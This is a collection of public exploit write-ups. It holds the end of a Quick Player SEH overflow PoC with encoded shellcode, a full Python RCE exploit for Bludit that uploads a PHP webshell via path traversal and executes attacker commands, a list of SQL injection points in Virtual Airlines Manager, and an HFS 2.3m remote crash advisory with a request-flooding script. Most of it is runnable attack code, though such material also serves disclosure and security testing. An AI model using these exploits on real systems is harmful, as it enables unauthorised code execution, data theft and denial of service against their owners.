b"\x30\x49\x6c\x46\x4c\x45\x34\x45\x70\x52\x54\x7a\x67" buf += b"\x35\x71\x66\x6f\x5a\x6d\x49\x71\x77\x57\x58\x6b\x59" buf += b"\x64\x4d\x6b\x73\x4c\x4d\x54\x6d\x58\x32\x55\x59\x51" buf += b"\x34\x4b\x4f\x6a\x4b\x74\x4d\x31\x6a\x4b\x71\x56\x62" buf += b"\x6b\x7a\x6c\x70\x4b\x34\x4b\x6e\x7a\x6d\x4c\x6b\x51" buf += b"\x48\x6b\x62\x6b\x5a\x64\x44\x4b\x59\x71\x5a\x48\x52" buf += b"\x69\x71\x34\x6d\x54\x4b\x6c\x71\x51\x46\x63\x37\x42" buf += b"\x4c\x48\x6c\x69\x38\x54\x62\x69\x58\x65\x52\x69\x79" buf += b"\x32\x72\x48\x44\x4e\x6e\x6e\x4c\x4e\x78\x6c\x32\x32" buf += b"\x5a\x48\x45\x4f\x49\x6f\x49\x6f\x4b\x4f\x53\x59\x71" buf += b"\x35\x69\x74\x77\x4b\x7a\x4f\x68\x4e\x49\x50\x51\x50" buf += b"\x64\x47\x4b\x6c\x6c\x64\x31\x42\x49\x58\x52\x6e\x59" buf += b"\x6f\x39\x6f\x49\x6f\x62\x69\x71\x35\x7a\x68\x33\x38" buf += b"\x30\x6c\x52\x4c\x6b\x70\x4e\x61\x71\x58\x4d\x63\x50" buf += b"\x32\x4e\x4e\x4f\x74\x52\x48\x71\x65\x34\x33\x32\x45" buf += b"\x31\x62\x4e\x50\x77\x6b\x62\x68\x71\x4c\x4e\x44\x4a" buf += b"\x6a\x52\x69\x6b\x36\x6e\x76\x79\x6f\x4f\x65\x6a\x64" buf += b"\x55\x39\x35\x72\x72\x30\x65\x6b\x56\x48\x77\x32\x6e" buf += b"\x6d\x75\x6c\x74\x47\x6d\x4c\x4f\x34\x62\x32\x5a\x48" buf += b"\x51\x4f\x4b\x4f\x49\x6f\x39\x6f\x73\x38\x70\x6f\x71" buf += b"\x68\x31\x48\x4b\x70\x53\x38\x50\x61\x4f\x77\x43\x35" buf += b"\x71\x32\x51\x58\x30\x4d\x30\x65\x72\x53\x53\x43\x6e" buf += b"\x51\x57\x6b\x63\x58\x6f\x6c\x6b\x74\x6a\x6a\x45\x39" buf += b"\x39\x53\x62\x48\x71\x54\x4d\x51\x6e\x78\x6d\x50\x61" buf += b"\x58\x70\x70\x31\x67\x32\x4e\x51\x55\x4d\x61\x69\x39" buf += b"\x72\x68\x6e\x6c\x6d\x54\x4b\x56\x33\x59\x48\x61\x4e" buf += b"\x51\x49\x42\x4f\x62\x30\x53\x4e\x71\x51\x42\x79\x6f" buf += b"\x38\x50\x6e\x51\x75\x70\x32\x30\x69\x6f\x32\x35\x4c" buf += b"\x48\x41\x41" alignment = "\x54\x71" # push esp, padding alignment += "\x58\x71" # pop eax, padding alignment += "\x05\x20\x22" # add eax, 0x22002000 alignment += "\x71" # Padding alignment += "\x2D\x19\x22" # sub eax, 0x22001900 alignment += "\x71" # Padding alignment += "\x50\x71" # push eax, padding alignment += "\xC3" # retn ret = "\x71\x41" + "\xF2\x41" # 0x004100f2 : pop esi # pop ebx # ret 0x04 | startnull,unicode {PAGE_EXECUTE_READWRITE} [Quick Player.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.3.0.0 (C:\Program Files\Quick Player\Quick Player.exe) buffer = "A" * 536 + ret + "\x41\x71\x41\x71" + alignment + "A" * 73 + buf + "A" * 200 f = open ("poc.m3l", "w") f.write(buffer) f.close()

# Exploit Title: Bludit 3.9.12 - Directory Traversal # Date: 2020-06-05 # Exploit Author: Luis Vacacas # Vendor Homepage: https://www.bludit.com # Software Link: https://github.com/bludit/bludit # Version: >= 3.9.12 # Tested on: Ubuntu 19.10 # CVE : CVE-2019-16113 #!/usr/bin/env python3 #-*- coding: utf-8 -*- import requests import re import argparse import random import string import base64 from requests.exceptions import Timeout class Color: PURPLE = '\033[95m' CYAN = '\033[96m' DARKCYAN = '\033[36m' BLUE = '\033[94m' GREEN = '\033[92m' YELLOW = '\033[93m' RED = '\033[91m' BOLD = '\033[1m' UNDERLINE = '\033[4m' END = '\033[0m' banner = base64.b64decode("4pWU4pWXIOKUrCAg4pSsIOKUrOKUjOKUrOKUkOKUrOKUjOKUrOKUkCAg4pWU4pWQ4pWX4pWmIOKVpuKVlOKVl+KVlArilaDilanilZfilIIgIOKUgiDilIIg4pSC4pSC4pSCIOKUgiAgIOKVoOKVkOKVneKVkeKVkeKVkeKVkeKVkeKVkQrilZrilZDilZ3ilLTilIDilJjilJTilIDilJjilIDilLTilJjilLQg4pS0ICAg4pWpICDilZrilanilZ3ilZ3ilZrilZ0KCiBDVkUtMjAxOS0xNjExMyBDeWJlclZhY2EKCg==").decode() print(Color.RED + Color.BOLD + "\n\n" + banner + Color.END) def get_args(): parser = argparse.ArgumentParser(description='Bludit RCE Exploit v3.9.2 CVE-2019-16113 \nBy @CyberVaca') parser.add_argument('-u', dest='url', type=str, required=True, help='Url Bludit') parser.add_argument('-user', dest='user', type=str,required=True, help='Username') parser.add_argument('-pass', dest='password', type=str, required=True, help='Password' ) parser.add_argument('-c', dest='command', type=str, required=True, help='Command to execute' ) return parser.parse_args() def randomString(stringLength=8): letters = string.ascii_lowercase return ''.join(random.choice(letters) for i in range(stringLength)) def informa(msg): print (Color.GREEN + "[" + Color.RED + "+" + Color.GREEN + "] " + msg) def login(url,username,password): session = requests.Session() login_page = session.get(url + "/admin/") csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1) informa("csrf_token: " + Color.END + csrf_token) la_cookie = ((login_page.headers['Set-Cookie']).split(";")[0].split("=")[1]) paramsPost = {"save":"","password":password,"tokenCSRF":csrf_token,"username":username} headers = {"Origin":url,"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0","Connection":"close","Referer": url + "/admin/","Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding":"gzip, deflate","Content-Type":"application/x-www-form-urlencoded"} cookies = {"BLUDIT-KEY":la_cookie} response = session.post(url + "/admin/", data=paramsPost, headers=headers, cookies=cookies, allow_redirects = False) informa("cookie: " + Color.END + la_cookie) return(la_cookie) def csrf_logado(url,la_cookie): session = requests.Session() headers = {"Origin":url,"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0","Connection":"close","Referer":url + "/admin/","Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding":"gzip, deflate"} cookies = {"BLUDIT-KEY":la_cookie} response = session.get(url + "/admin/dashboard", headers=headers, cookies=cookies) token_logado = response.text.split('var tokenCSRF = "')[1].split('"')[0] informa("csrf_token: " + Color.END + token_logado) return token_logado def subida_shell(url,la_cookie,token_logado,command,webshell): session = requests.Session() paramsPost = {"uuid":"../../tmp","tokenCSRF":token_logado} paramsMultipart = [('images[]', (webshell, "<?php shell_exec(\"rm .htaccess ; rm " + webshell + " ;" + command + "\");?>", 'application/octet-stream'))] headers = {"Origin":url,"Accept":"*/*","X-Requested-With":"XMLHttpRequest","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0","Connection":"close","Referer":url + "/admin/new-content","Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding":"gzip, deflate"} cookies = {"BLUDIT-KEY":la_cookie} response = session.post(url + "/admin/ajax/upload-images", data=paramsPost, files=paramsMultipart, headers=headers, cookies=cookies) informa("Uploading " + Color.END + webshell + Color.END) def subida_htaccess(url,la_cookie,token_logado): session = requests.Session() paramsPost = {"uuid":"../../tmp","tokenCSRF":token_logado} paramsMultipart = [('images[]', ('.htaccess', "RewriteEngine off\r\nAddType application/x-httpd-php .jpg", 'application/octet-stream'))] headers = {"Origin":url,"Accept":"*/*","X-Requested-With":"XMLHttpRequest","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0","Connection":"close","Referer":url + "/admin/new-content","Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding":"gzip, deflate"} cookies = {"BLUDIT-KEY":la_cookie} response = session.post(url + "/admin/ajax/upload-images", data=paramsPost, files=paramsMultipart, headers=headers, cookies=cookies) def trigger_command(url,webshell,command): session = requests.Session() headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0","Connection":"close","Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding":"gzip, deflate"} try: response = session.get(url + "/bl-content/tmp/" + webshell, headers=headers, timeout=1) except requests.exceptions.ReadTimeout: pass informa("Executing command: " + Color.END + command ) informa("Delete: " + Color.END + ".htaccess") informa("Delete: " + Color.END + webshell) if __name__ == '__main__': args = get_args() webshell = randomString(8) + ".jpg" la_cookie = login(args.url,args.user,args.password) token_logado = csrf_logado(args.url,la_cookie) subida_shell(args.url,la_cookie,token_logado,args.command,webshell) subida_htaccess(args.url,la_cookie,token_logado) trigger_command(args.url,webshell,args.command)

# Exploit Title: Virtual Airlines Manager 2.6.2 - 'airport' SQL Injection # Google Dork: N/A # Date: 2020-06-08 # Exploit Author: Kostadin Tonev # Vendor Homepage: http://virtualairlinesmanager.net # Software Link: https://virtualairlinesmanager.net/index.php/vam-releases/ # Version: 2.6.2 # Tested on: Linux Mint # CVE : N/A . . . . . . . . . + . . . : . .. :. .___---------___. . . . . :.:. _".^ .^ ^. '.. :"-_. . . : . . .:../: . .^ :.:\. . . :: +. :.:/: . . . . . .:\ . : . . _ :::/: . ^ . . .:\ .. . . . - : :.:./. . .:\ . . . :..|: . . ^. .:| . . : : ..|| . . . !:| . . . . ::. ::\( . :)/ . . : . : .:.|. ###### .#######::| :.. . :- : .: ::|.####### ..########:| . . . .. . .. :\ ######## :######## :/ . .+ :: : -.:\ ######## . ########.:/ . .+ . . . . :.:\. ####### #######..:/ :: . . . . ::.:..:.\ . . ..:/ . . . .. : -::::.\. | | . .:/ . : . . .-:.":.::.\ ..:/ . -. . . . .: .:::.:.\. .:/ . . . : : ....::_:..:\ ___. :/ . . . .:. .. . .: :.:.:\ :/ + . . : . ::. :.:. .:.|\ .:/| . + . . ...:: ..| --.:| . . . . . . . ... :..:.."( ..)" . . . : . .: ::/ . .::\ [1] Vulnerable GET parameter: notam_id=[SQLi] [PoC] http://localhost/vam/index.php?page=notam&notam_id=[SQLi] [2] Vulnerable GET parameter: airport=[SQLi] [PoC] http://localhost/vam/index.php?page=airport_info&airport=[SQLi] [3] Vulnerable GET parameter: registry_id=[SQLi] [PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi] [4] Vulnerable GET parameter: plane_location=[SQLi] [PoC] http://localhost/vam/index.php?page=fleet_public&plane_location=[SQLi] [5] Vulnerable GET parameter: hub_id=[SQLi] [PoC] http://localhost/vam/index.php?page=hub&hub_id=[SQLi] [6] Vulnerable GET parameter: pilot_id=[SQLi] [PoC] http://localhost/vam/index.php?page=pilot_details&pilot_id=[SQLi] [7] Vulnerable GET parameter: registry_id=[SQLi] [PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi] [8] Vulnerable GET parameter: event_id=[SQLi] [PoC] http://localhost/vam/index.php?page=event&event_id=[SQLi] [9] Vulnerable GET parameter: tour_id=[SQLi] [PoC] http://localhost/vam/index.php?page=tour_detail&tour_id=[SQLi]

# Exploit Title: HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC) # Date: 2020-06-05 # Exploit Author: hyp3rlinx # Vendor Homepage: www.rejetto.com # CVE : CVE-2020-13432 [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/HFS-HTTP-FILE-SERVER-v2.3-REMOTE-BUFFER-OVERFLOW-DoS.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.rejetto.com [Product] HFS Http File Server v2.3m Build 300 [Vulnerability Type] Remote Buffer Overflow (DoS) [CVE Reference] CVE-2020-13432 [Security Issue] rejetto HFS (aka HTTP File Server) v2.3m Build #300, when virtual files or folders are used, allows remote attackers to trigger an invalid-pointer write access violation via concurrent HTTP requests with a long URI or long HTTP headers like Cookie, User-Agent etc. Remote unauthenticated attackers can send concurrent HTTP requests using an incrementing or specific payload range of junk characters for values in the URL parameters or HTTP headers sent to the server. This results in hfs.exe server crash from an invalid pointer write access violation. Requirements: hfs.exe must have at least one saved virtual file or folder present. Test using a remote IP and NOT from the same machine (localhost). Dump... (e4c.3a8): Access violation - code c0000005 (first/second chance not available) For analysis of this file, run !analyze -v WARNING: Stack overflow detected. The unwound frames are extracted from outside normal stack bounds. eax=000a1390 ebx=000a138c ecx=006eb188 edx=001b0000 esi=00000000 edi=00000002 eip=777ef8b4 esp=000a0e0c ebp=000a12cc iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 ntdll!RtlpResolveAssemblyStorageMapEntry+0x18: 777ef8b4 53 push ebx 0:000> !load winext/msec 0:000> !exploitable WARNING: Stack overflow detected. The unwound frames are extracted from outside normal stack bounds. *** WARNING: Unable to verify checksum for hfs.exe Exploitability Classification: EXPLOITABLE Recommended Bug Title: Exploitable - User Mode Write AV starting at ntdll!RtlpResolveAssemblyStorageMapEntry+0x0000000000000018 (Hash=0x7a29717c.0x325e6a71) PROCESS_NAME: hfs.exe FOLLOWUP_IP: hfs+8fad7 0048fad7 8945f0 mov dword ptr [ebp-10h],eax WRITE_ADDRESS: 000a0e08 [References] https://github.com/rejetto/hfs2/releases/tag/v2.4-rc01 [Exploit/POC] from socket import * import time,sys #HFS HTTP File Server v2.3m build 300. #Vendor: www.rejetto.com #Remote Remote Buffer Overflow DoS #Note: hfs.exe must have at least one saved virtual file or folder on the target #test using a remote IP and not from the same machine. #Discovery: hyp3rlinx #hyp3rlinx.altervista.org #ISR: ApparitionSec #========================================================================= res="" once=0 cnt=0 max_requests=1666 def hfs_dos(): global ip,port,length,res,once,cnt,max_requests cnt+=1 length += 1 payload = "A"*length try: s=socket(AF_INET, SOCK_STREAM) s.settimeout(2) s.connect((ip,port)) ##bof ="HEAD / HTTP/1.1\r\nHost: "+ip+"Cookie: "+payload+"\r\n\r\n" bof ="HEAD /?mode="+payload+" HTTP/1.1\r\nHost: "+ip+"\r\n\r\n" s.send(bof.encode("utf-8")) if once==0: once+=1 res = s.recv(128) if res != "": print("Targets up please wait...") if "HFS 2.3m" not in str(res): print("[!] Non vulnerable HFS version, exiting :(") exit() except Exception as e: if e != None: if str(e).find("timed out")!=-1: if res=="": print("[!] Target is not up or behind a firewall? :(") exit() else: print("[!] Done!") exit() s.close() if cnt == max_requests: return False return True def msg(): print("HFS HTTP File Server v2.3m build 300.") print("Unauthenticated Remote Buffer Overflow (DoS - PoC)") print("Virtual HFS saved file or folder required.") print("Run from a different machine (IP) than the target.") print("By Hyp3rlinx - ApparitionSec\n") if __name__=="__main__": length=3 if len(sys.argv) != 3: msg() print("Usage: <hfs.exe Server>, <Port (usually 8080)>") exit() ip = sys.argv[1] port = int(sys.argv[2]) msg() while True: if not hfs_dos(): print("[!] Failed, non vuln version or no virtual files exist :(") break [POC Video URL] https://www.youtube.com/watch?v=qQ-EawfXuWY [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: May 18, 2020 Vendor reply: May 18, 2020 Vendor confirm vulnerability: May 19, 2020 Vendor creates fix: May 20, 2020 Vendor released new version 2.4 : June 7, 2020 June 8, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx